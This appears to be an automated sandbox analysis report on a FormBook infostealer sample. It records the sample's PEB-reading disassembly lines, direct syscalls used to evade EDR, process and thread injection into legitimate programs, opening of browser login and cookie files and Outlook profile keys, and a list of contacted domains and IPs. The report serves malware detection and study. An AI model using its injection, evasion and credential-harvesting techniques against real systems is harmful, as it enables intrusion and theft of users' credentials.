Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01871763 mov eax, dword ptr fs:[00000030h]	2_2_01871763
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01871763 mov eax, dword ptr fs:[00000030h]	2_2_01871763
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01871763 mov eax, dword ptr fs:[00000030h]	2_2_01871763
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01871763 mov eax, dword ptr fs:[00000030h]	2_2_01871763
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01871763 mov eax, dword ptr fs:[00000030h]	2_2_01871763
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01834779 mov eax, dword ptr fs:[00000030h]	2_2_01834779
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01834779 mov eax, dword ptr fs:[00000030h]	2_2_01834779
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF68C mov eax, dword ptr fs:[00000030h]	2_2_018EF68C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680 mov eax, dword ptr fs:[00000030h]	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01838690 mov eax, dword ptr fs:[00000030h]	2_2_01838690
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AD69D mov eax, dword ptr fs:[00000030h]	2_2_018AD69D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BC691 mov eax, dword ptr fs:[00000030h]	2_2_018BC691
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F86A8 mov eax, dword ptr fs:[00000030h]	2_2_018F86A8
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F86A8 mov eax, dword ptr fs:[00000030h]	2_2_018F86A8
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018306CF mov eax, dword ptr fs:[00000030h]	2_2_018306CF
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FA6C0 mov eax, dword ptr fs:[00000030h]	2_2_018FA6C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185D6D0 mov eax, dword ptr fs:[00000030h]	2_2_0185D6D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018296E0 mov eax, dword ptr fs:[00000030h]	2_2_018296E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018296E0 mov eax, dword ptr fs:[00000030h]	2_2_018296E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183C6E0 mov eax, dword ptr fs:[00000030h]	2_2_0183C6E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018356E0 mov eax, dword ptr fs:[00000030h]	2_2_018356E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018356E0 mov eax, dword ptr fs:[00000030h]	2_2_018356E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018356E0 mov eax, dword ptr fs:[00000030h]	2_2_018356E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AC6F2 mov eax, dword ptr fs:[00000030h]	2_2_018AC6F2
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AC6F2 mov eax, dword ptr fs:[00000030h]	2_2_018AC6F2
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF607 mov eax, dword ptr fs:[00000030h]	2_2_018EF607
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01904600 mov eax, dword ptr fs:[00000030h]	2_2_01904600
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01837623 mov eax, dword ptr fs:[00000030h]	2_2_01837623
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DD62C mov ecx, dword ptr fs:[00000030h]	2_2_018DD62C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DD62C mov ecx, dword ptr fs:[00000030h]	2_2_018DD62C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DD62C mov eax, dword ptr fs:[00000030h]	2_2_018DD62C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01835622 mov eax, dword ptr fs:[00000030h]	2_2_01835622
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01835622 mov eax, dword ptr fs:[00000030h]	2_2_01835622
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01830630 mov eax, dword ptr fs:[00000030h]	2_2_01830630
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01833640 mov eax, dword ptr fs:[00000030h]	2_2_01833640
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184F640 mov eax, dword ptr fs:[00000030h]	2_2_0184F640
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184F640 mov eax, dword ptr fs:[00000030h]	2_2_0184F640
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184F640 mov eax, dword ptr fs:[00000030h]	2_2_0184F640
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186C640 mov eax, dword ptr fs:[00000030h]	2_2_0186C640
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186C640 mov eax, dword ptr fs:[00000030h]	2_2_0186C640
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182D64A mov eax, dword ptr fs:[00000030h]	2_2_0182D64A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182D64A mov eax, dword ptr fs:[00000030h]	2_2_0182D64A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183965A mov eax, dword ptr fs:[00000030h]	2_2_0183965A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183965A mov eax, dword ptr fs:[00000030h]	2_2_0183965A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186265C mov eax, dword ptr fs:[00000030h]	2_2_0186265C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186265C mov ecx, dword ptr fs:[00000030h]	2_2_0186265C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186265C mov eax, dword ptr fs:[00000030h]	2_2_0186265C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01827662 mov eax, dword ptr fs:[00000030h]	2_2_01827662
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01827662 mov eax, dword ptr fs:[00000030h]	2_2_01827662
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01827662 mov eax, dword ptr fs:[00000030h]	2_2_01827662
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186666D mov esi, dword ptr fs:[00000030h]	2_2_0186666D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186666D mov eax, dword ptr fs:[00000030h]	2_2_0186666D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186666D mov eax, dword ptr fs:[00000030h]	2_2_0186666D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01830670 mov eax, dword ptr fs:[00000030h]	2_2_01830670
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186C98F mov eax, dword ptr fs:[00000030h]	2_2_0186C98F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186C98F mov eax, dword ptr fs:[00000030h]	2_2_0186C98F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186C98F mov eax, dword ptr fs:[00000030h]	2_2_0186C98F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BF9AA mov eax, dword ptr fs:[00000030h]	2_2_018BF9AA
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BF9AA mov eax, dword ptr fs:[00000030h]	2_2_018BF9AA
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B9B0 mov eax, dword ptr fs:[00000030h]	2_2_0182B9B0

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtOpenFile: Direct from: 0x77DA2CEC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtAllocateVirtualMemory: Direct from: 0x77DA3BBC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtQueryInformationToken: Direct from: 0x77DA2BCC	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	NtQueueApcThread: Indirect: 0x17BF497	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtCreateFile: Direct from: 0x77DA2F0C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtAllocateVirtualMemory: Direct from: 0x77DA2B0C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtOpenSection: Direct from: 0x77DA2D2C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtProtectVirtualMemory: Direct from: 0x77D97A4E	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x5D298FD	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtTerminateThread: Direct from: 0x7FFC17602651	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtMapViewOfSection: Direct from: 0x77DA2C3C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtResumeThread: Direct from: 0x77DA35CC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtAllocateVirtualMemory: Direct from: 0x77DA2B1C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtSetInformationProcess: Direct from: 0x77DA2B7C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtNotifyChangeKey: Direct from: 0x77DA3B4C	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x5D2972E	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x5D31488	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtOpenKeyEx: Direct from: 0x77DA2ABC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtQueryInformationProcess: Direct from: 0x77DA2B46	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	NtSuspendThread: Indirect: 0x17C3A29	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	NtResumeThread: Indirect: 0x17C3D49	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtDelayExecution: Direct from: 0x77DA2CFC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtSetInformationThread: Direct from: 0x77D96319	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtQuerySystemInformation: Direct from: 0x77DA2D1C	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtResumeThread: Direct from: 0x5D29974	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtDeviceIoControlFile: Direct from: 0x77DA2A0C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtQuerySystemInformation: Direct from: 0x77DA47EC	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtCreateKey: Direct from: 0x77DA2B8C	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	NtClose: Indirect: 0x17BF52B
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtSetInformationThread: Direct from: 0x77DA2A6C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtQueryAttributesFile: Direct from: 0x77DA2D8C	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtClose: Direct from: 0x77DA2A8C
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	NtProtectVirtualMemory: Direct from: 0x77DA2EBC	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	NtSetContextThread: Indirect: 0x17C3709	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Memory written: C:\Users\user\Desktop\SOA SIL TL382920.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Thread register set: target process: 6744			Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Thread register set: target process: 3176			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process created: C:\Users\user\Desktop\SOA SIL TL382920.exe "C:\Users\user\Desktop\SOA SIL TL382920.exe"	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: RAVCpl64.exe, 00000003.00000002.23443863823.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.21205048514.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23444493476.0000000001D31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: RAVCpl64.exe, 00000003.00000002.23443863823.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.21205048514.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23444493476.0000000001D31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RAVCpl64.exe, 00000003.00000002.23443863823.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.21205048514.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23444493476.0000000001D31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Queries volume information: C:\Users\user\Desktop\SOA SIL TL382920.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.SOA SIL TL382920.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SOA SIL TL382920.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\replace.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.SOA SIL TL382920.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SOA SIL TL382920.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SOA SIL TL382920.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
07t90q.vip	3.33.130.190	true	false	unknown
webredir.vip.gandi.net	217.70.184.50	true	false	unknown
www.tribevas.online	184.94.215.26	true	false	unknown
www.toteforcar.site	185.104.28.27	true	false	unknown
stratogent.info	76.223.105.230	true	false	unknown
